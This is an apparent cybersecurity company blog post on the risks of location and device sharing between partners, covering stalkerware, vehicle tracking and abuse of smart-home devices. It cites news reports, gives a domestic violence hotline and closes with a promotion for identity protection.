With the popularity of Internet of Things devices like smart doorbells and baby monitors, some partners may want to consider how safe they are from spying in their own homes. Plenty of user posts on a variety of community forums claim that exes and former spouses weaponized video-equipped doorbells and baby monitors to spy on a partner.

These scenarios are frightening, but they are part of a larger question about whether you should share your location with your partner. With the proper care and discussion, your location-sharing will be consensual, respected, and convenient for all.

****Stalking and abuse****

When discussing the risks around digital sharing between couples, it’s important to clarify that trustworthy partners do not become abusive simply because of their access to technology. A shared food delivery app doesn’t guarantee that a partner will be spied on. A baby monitor with a live video stream is sometimes just that—a baby monitor.

But many of the stories shared here expose the dangers that lie within arm’s reach for abusive partners. The technology alone cannot be blamed for the abuse. Instead, the technology must be scrutinized simply because of its ubiquitous use in today’s world.

The most serious concerns regarding digital access are the potential for stalking and abuse.

For partners that share devices and device passcodes, the notorious threat of stalkerware makes it easy for an abusive partner to pry into a person’s photos, videos, phone calls, text messages, locations, and more. Stalkerware can be installed on a person’s device in a matter of minutes—a low barrier of entry for couples that live with one another and who share each other’s device passcodes.

For partners who share a vehicle, a recent problem has emerged. In December, The New York Times reported on the story of a woman who—despite obtaining a restraining order against her ex-husband—could not turn off her shared vehicle’s location tracking. Because the car was in her husband’s name, he was able to reportedly continue tracking and harassing her.

Even shared smart devices have become a threat. According to reporting from The New York Times in 2018, survivors of domestic abuse began calling support lines with a bevvy of new concerns within their homes:

> “One woman had turned on her air-conditioner, but said it then switched off without her touching it. Another said the code numbers of the digital lock at her front door changed every day and she could not figure out why. Still another told an abuse help line that she kept hearing the doorbell ring, but no one was there.”

The survivors’ stories all pointed to the abuse of shared smart devices.

Whereas the solutions to many of the inconveniences and annoyances that can come with shared digital access are simple—a reset password, a removal of a shared account—the “solutions” for technology-enabled abuse are far more complex. These are problems that cannot be solely addressed with advice and good cybersecurity hygiene.

If you are personally experiencing this type of harassment, you can contact the National Network to End Domestic Violence on their hotline at 1-800-799-SAFE.

****Making sure things go right****

Sharing your life with your partner should be a function of trust, and for many couples, it is. But, in the same way that it is impossible for a cybersecurity company to ignore even one ransomware attack, it’s also improper for this cybersecurity and privacy company to ignore the reality facing many couples today.

There are new rules and standards for digital access within relationships. With the right information and the right guidance, hopefully more people will feel empowered to make the best decisions for themselves.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Tag

#git